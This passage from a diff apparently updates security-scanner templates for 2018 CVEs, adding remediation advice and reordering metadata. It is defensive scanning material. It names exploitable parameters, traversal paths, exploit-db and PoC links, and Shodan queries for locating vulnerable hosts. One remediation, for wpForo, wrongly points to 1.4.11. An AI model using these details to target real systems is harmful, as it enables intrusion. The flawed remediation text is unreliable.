c24aac42b2..f9e1a8ec28 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -6,6 +6,8 @@ info: severity: high description: | AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution. + remediation: | + Apply the latest firmware update provided by AudioCodes to fix the vulnerability and ensure proper input validation. reference: - https://www.exploit-db.com/exploits/46164 - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-10093 cwe-id: CWE-862 epss-score: 0.06287 - cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* epss-percentile: 0.92688 + cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 vendor: audiocodes diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index f8151245f8..8a11077dbd 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. + remediation: | + Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability. reference: - https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/ - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56 @@ -18,8 +20,8 @@ info: cve-id: CVE-2018-10095 cwe-id: CWE-79 epss-score: 0.95296 - cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* epss-percentile: 0.99069 + cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dolibarr diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index a3ad528525..653f661ca5 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting. + remediation: | + Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability. reference: - https://security.paloaltonetworks.com/CVE-2018-10141 - https://nvd.nist.gov/vuln/detail/CVE-2018-10141 @@ -14,8 +16,8 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 - cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* epss-percentile: 0.46484 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 02b2f9a6b9..9059365187 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -5,6 +5,8 @@ info: author: 0x_akoko severity: high description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability. + remediation: | + Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-10201 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-10201 cwe-id: CWE-22 epss-score: 0.063 - cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* epss-percentile: 0.92695 + cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 vendor: ncomputing diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 026875d4a6..861e184639 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. + remediation: | + Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. reference: - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - https://www.zend.com/en/products/server/release-notes @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-10230 cwe-id: CWE-79 epss-score: 0.00122 - cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* epss-percentile: 0.45743 + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zend diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index b30d69e1e3..3fc4a67e12 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-10562 cwe-id: CWE-78 epss-score: 0.97576 - cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.99999 + cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dasannetworks diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml index 3cf9e915dc..76ac3674bd 100644 --- a/http/cves/2018/CVE-2018-10818.yaml +++ b/http/cves/2018/CVE-2018-10818.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter. + remediation: | + Apply the latest firmware update provided by LG to mitigate this vulnerability. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 67ec795841..fb52a5ef1c 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface. + remediation: | + Apply the latest firmware update provided by D-Link to fix the vulnerability reference: - https://www.exploit-db.com/exploits/45678 - http://sploit.tech/2018/10/12/D-Link.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-10822 cwe-id: CWE-22 epss-score: 0.17386 - cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.95419 + cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index cf60450f35..af1b49c7d2 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -6,6 +6,8 @@ info: severity: high description: | D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45676 - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-10823 cwe-id: CWE-78 epss-score: 0.96863 - cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99564 + cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 297afc058a..063588bf3e 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion. + remediation: | + Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability. reference: - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb @@ -17,13 +19,13 @@ info: cve-id: CVE-2018-10956 cwe-id: CWE-22 epss-score: 0.65072 - cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* epss-percentile: 0.97442 + cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"Orchid Core VMS" vendor: ipconfigure product: orchid_core_vms + shodan-query: http.title:"Orchid Core VMS" tags: cve,cve2018,orchid,vms,lfi,edb http: diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 7916f6ab2a..0d602eaf9b 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor. reference: - https://github.com/monstra-cms/monstra/issues/438 - https://www.exploit-db.com/exploits/44646 @@ -17,14 +19,14 @@ info: cve-id: CVE-2018-11227 cwe-id: CWE-79 epss-score: 0.02667 - cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* epss-percentile: 0.89064 + cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:419828698 verified: true + max-request: 1 vendor: monstra product: monstra_cms + shodan-query: http.favicon.hash:419828698 tags: cve,cve2018,xss,mostra,mostracms,cms,edb http: diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index a44352b3bc..71ebf9e7b3 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -6,6 +6,8 @@ info: severity: high description: | OpenCart Divido plugin is susceptible to SQL injection + remediation: | + Apply the official patch or upgrade to a version that includes the fix. reference: - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183 - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 @@ -16,13 +18,13 @@ info: cve-id: CVE-2018-11231 cwe-id: CWE-89 epss-score: 0.00903 - cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* epss-percentile: 0.80727 + cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 - framework: opencart vendor: divido product: divido + framework: opencart tags: cve,cve2018,opencart,sqli,intrusive variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 813b9715e1..b5118a2e4c 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key. + remediation: | + Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability. reference: - https://github.com/kofa2002/splunk - https://www.exploit-db.com/exploits/44865/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-11409 cwe-id: CWE-200 epss-score: 0.95758 - cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* epss-percentile: 0.99181 + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: splunk diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 909e83933c..9510ab55b3 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/monstra-cms/monstra/issues/446 - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page @@ -16,14 +18,14 @@ info: cve-id: CVE-2018-11473 cwe-id: CWE-79 epss-score: 0.00097 - cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* epss-percentile: 0.39898 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.favicon.hash:419828698 verified: true + max-request: 2 vendor: monstra product: monstra + shodan-query: http.favicon.hash:419828698 tags: cve,cve2018,xss,mostra,mostracms,cms http: diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 5fe2b73bc0..f6e9e76821 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. + remediation: | + Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - https://wordpress.org/plugins/wpforo/#developers @@ -16,13 +18,13 @@ info: cve-id: CVE-2018-11709 cwe-id: CWE-79 epss-score: 0.00151 - cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* epss-percentile: 0.50613 + cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: gvectors product: wpforo_forum + framework: wordpress tags: cve,cve2018,wordpress,xss,wp-plugin http: diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 7d08ad065d..7eea3583a6 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical. + remediation: | + Upgrade to a patched version of Apache Tomcat JK Connect (1.2.45 or higher) or apply the recommended security patches. reference: - https://github.com/immunIT/CVE-2018-11759 - https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E @@ -18,13 +20,13 @@ info: cve-id: CVE-2018-11759 cwe-id: CWE-22 epss-score: 0.97443 - cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:* epss-percentile: 0.99916 + cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: title:"Apache Tomcat" vendor: apache product: tomcat_jk_connector + shodan-query: title:"Apache Tomcat" tags: cve,cve2018,apache,tomcat,httpd,mod-jk http: diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 8c661eb508..902cee9120 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - https://github.com/jas502n/St2-057 - https://cwiki.apache.org/confluence/display/WW/S2-057 @@ -18,8 +20,8 @@ info: cve-id: CVE-2018-11776 cwe-id: CWE-20 epss-score: 0.97557 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* epss-percentile: 0.99995 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index af52b2ed44..66e4fd3979 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. + remediation: | + Upgrade to Apache Tomcat version 9.0.12 or later, or apply the relevant patch provided by the Apache Software Foundation. reference: - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2018-11784 @@ -18,13 +20,13 @@ info: cve-id: CVE-2018-11784 cwe-id: CWE-601 epss-score: 0.96524 - cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* epss-percentile: 0.99413 + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Apache Tomcat" vendor: apache product: tomcat + shodan-query: title:"Apache Tomcat" tags: packetstorm,tomcat,redirect,cve,cve2018,apache http: diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 27d6fd7b53..5ad0f2efe6 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. + remediation: | + Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://www.exploit-db.com/exploits/48614 @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-12031 cwe-id: CWE-22 epss-score: 0.01411 - cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* epss-percentile: 0.84811 + cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eaton diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 1c99b61b97..d27be094e2 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -5,6 +5,8 @@ info: author: wisnupramoedya severity: high description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal. + remediation: | + Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script. reference: - https://www.exploit-db.com/exploits/44874 - https://nvd.nist.gov/vuln/detail/CVE-2018-12054 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-12054 cwe-id: CWE-22 epss-score: 0.43824 - cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* epss-percentile: 0.96879 + cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: schools_alert_management_script_project diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 98f218b5df..e7a0400c5f 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -8,6 +8,8 @@ info: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. + remediation: | + Apply the latest firmware updates provided by Dell to mitigate this vulnerability. reference: - https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py @@ -20,8 +22,8 @@ info: cve-id: CVE-2018-1207 cwe-id: CWE-94 epss-score: 0.01778 - cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* epss-percentile: 0.86487 + cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dell diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 627c331bad..4351fa57e1 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php. + remediation: | + Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/44895 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-12095 cwe-id: CWE-79 epss-score: 0.00407 - cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* epss-percentile: 0.70495 + cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oecms_project diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 1636f9a33f..89a2a6a0e5 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos. + remediation: | + Upgrade to a patched version of Seagate NAS OS. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 @@ -14,8 +16,8 @@ info: cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.01503 - cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* epss-percentile: 0.85298 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: seagate diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 92f7e22058..0b072cd49a 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. + remediation: | + Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - https://nvd.nist.gov/vuln/detail/CVE-2018-12300 @@ -14,8 +16,8 @@ info: cve-id: CVE-2018-12300 cwe-id: CWE-601 epss-score: 0.00118 - cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* epss-percentile: 0.45103 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: seagate diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index f27ae5be55..9977d721cf 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). + remediation: | + Upgrade PhpMyAdmin to version 4.8.2 or later to fix the vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 - https://www.phpmyadmin.net/security/PMASA-2018-4/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-12613 cwe-id: CWE-287 epss-score: 0.97383 - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* epss-percentile: 0.99864 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 794f558ad9..9a7407fd1c 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station. + remediation: | + Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability. reference: - https://circontrol.com/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12634 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-12634 cwe-id: CWE-200 epss-score: 0.95864 - cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* epss-percentile: 0.99211 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: circontrol diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 769964b0ef..63f0ae2ffc 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. reference: - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory - https://vuldb.com/?id.125799 @@ -17,11 +19,11 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.00118 - cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* epss-percentile: 0.45103 + cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: sv3c product: h.264_poe_ip_camera_firmware tags: cve,cve2018,redirect,sv3c,camera,iot diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index eb3fd429bb..aeb370861b 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -5,6 +5,8 @@ info: author: hetroublemakr severity: medium description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + remediation: | + Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability. reference: - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - https://pivotal.io/security/cve-2018-1271 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-1271 cwe-id: CWE-22 epss-score: 0.00803 - cpe: 